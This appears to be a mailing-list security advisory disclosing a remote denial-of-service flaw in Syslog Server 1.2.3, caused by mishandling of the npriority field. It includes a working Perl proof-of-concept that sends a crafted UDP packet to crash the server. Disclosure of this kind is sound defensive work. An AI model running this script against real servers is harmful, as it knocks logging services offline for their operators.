[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Syslog Server "npriority" field remote Denial of Service vulnerability



Title: Syslog Server "npriority" field remote Denial of Service vulnerability
Software : Syslog Server

Software Version : Syslog Server 1.2.3

Vendor: https://sourceforge.net/p/syslog-server/

Vulnerability Published : 2016-07-02

Vulnerability Update Time :

Status : 

Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)

Bug Description :
Syslog Server 1.2.3 is a free syslog server for Windows systems.
The syslog server cannot handle the content of the npriority field well, whereupon the server may be collapsed by receiving a customized packet.

Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl -w
#PoC by demonalex (chaoyi.huang_at_connect.polyu.hk || demonalex_at_163.com)
use IO::Socket;
use POSIX qw(strftime);
$|=1;

$host=shift;
$port=shift;

die "Usage: $0 \$host \$port\n" if ((!defined($host)) || (!defined($port)));

$npriority = '<A>';
$ndate = strftime "%b%e %H:%M:%S", localtime;
$nhostname = "10.0.0.2";
$npid = 'fuzzer[10]';
$nmsg = "Syslog Fuzzer v2";

$header = $ndate.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;

$con=new IO::Socket::INET->new(PeerPort=>$port, Proto=>'udp', PeerAddr=>$host);
$con->send($packet);
print "Done!\n";
$con->close;

exit(0);
-----------------------------------------------------------

Credits : This vulnerability was discovered by ChaoYi.Huang_at_connect.polyu.hk
mail: ChaoYi(dot)Huang(at)connect(dot)polyu(dot)hk / demonalex(at)163(dot)com / chaoyi(dot)huang(at)ccbny(dot)com
Pentester/Independent Researcher